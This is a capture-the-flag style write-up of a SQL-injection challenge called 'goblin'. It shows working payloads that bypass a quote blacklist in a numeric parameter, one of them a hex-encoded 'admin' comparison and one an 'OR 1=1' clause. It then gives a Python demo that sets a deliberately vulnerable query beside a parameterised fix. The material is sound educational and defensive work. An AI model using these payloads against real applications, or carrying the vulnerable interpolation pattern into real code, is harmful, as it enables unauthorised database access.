goblin
We are provided with the SQL query:
SELECT id FROM prob_goblin WHERE id='guest' AND no={$_GET[no]}
This time the application blocks quotation marks. It also does not directly insert user input into the id field.
The code also performs two conditional checks:
if($result['id']): it checks whether the query returned a row (i.e. the result is True). If yes, it prints the message Hello {$result[id]}.
if($result['id'] == 'admin'): it then checks whether the returned id is set to admin. If yes, it prints the flag.
We want the second conditional statement to be executed.
There are two methods.
Method 1
In order to make the result of the first query False, we can provide the following URI parameter:
?no=0
The resultant query then becomes:
SELECT id FROM prob_goblin WHERE id='guest' AND no=0
Since no=0 is always false, the result of the AND operation will always be False.
As expected, the Hello {$result[id]} message isn't printed.
In order to execute the second conditional statement, we can provide the following URI parameter:
?no=0 OR id=0x61646d696e
We are providing the hexadecimal representation of the admin string.
The resultant query will be:
SELECT id FROM prob_goblin WHERE id='guest' AND no=0 OR id=0x61646d696e
The result of the first condition (id='guest' AND no=0) is already False, and because the OR clause matches the row whose id field is admin, $result['id'] becomes admin and the flag will be printed.
Method 2
If we provide the following URI parameter:
?no=no
The resultant query will be:
SELECT id FROM prob_goblin WHERE id='guest' AND no=no
The result will always be True, since any column (no) compared with itself is always true.
Next, if we add an OR command as follows:
?no=no OR 1=1 ORDER BY id;
The resultant query will be:
SELECT id FROM prob_goblin WHERE id='guest' AND no=no OR 1=1 ORDER BY id;
This will print out all the rows, as 1=1 is always true and anything OR'd with true is true.
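The root cause in both methods is the same: the no parameter is interpolated into a numeric context, so a blacklist of quotation marks never sees anything it would block. The following is an added example (not the challenge's own code) that reproduces the vulnerable query against a constructed in-memory SQLite table and places the fix beside it: enforce an integer type before the query and bind it as a parameter. It uses the Method 2 payload because SQLite reads 0x61646d696e as an integer literal rather than as the string admin, unlike MySQL.

```python
import sqlite3


def make_db():
    # Constructed stand-in for prob_goblin with sample rows (not the real challenge data).
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE prob_goblin (id TEXT, no INTEGER)")
    conn.executemany(
        "INSERT INTO prob_goblin VALUES (?, ?)",
        [("guest", 1), ("admin", 2)],
    )
    return conn


def quote_filter(value):
    # Mirrors the challenge's blacklist: quotation marks are rejected, nothing else is.
    if any(c in value for c in "'\"`"):
        raise ValueError("no hack")
    return value


def vulnerable_lookup(conn, no):
    # The page's query: the filtered value is spliced into a numeric context without quotes,
    # so "no OR 1=1 ORDER BY id" passes the filter and rewrites the WHERE clause.
    sql = f"SELECT id FROM prob_goblin WHERE id='guest' AND no={quote_filter(no)}"
    return [row[0] for row in conn.execute(sql)]


def hardened_lookup(conn, no):
    # Fix: validate the type first (anything that is not an integer is refused outright),
    # then pass the value as a bound parameter so it can never be parsed as SQL.
    try:
        no_int = int(no)
    except ValueError:
        return []
    sql = "SELECT id FROM prob_goblin WHERE id='guest' AND no=?"
    return [row[0] for row in conn.execute(sql, (no_int,))]


if __name__ == "__main__":
    db = make_db()
    payload = "no OR 1=1 ORDER BY id"
    print("vulnerable:", vulnerable_lookup(db, payload))  # every row comes back
    print("hardened:  ", hardened_lookup(db, payload))    # refused, nothing returned
```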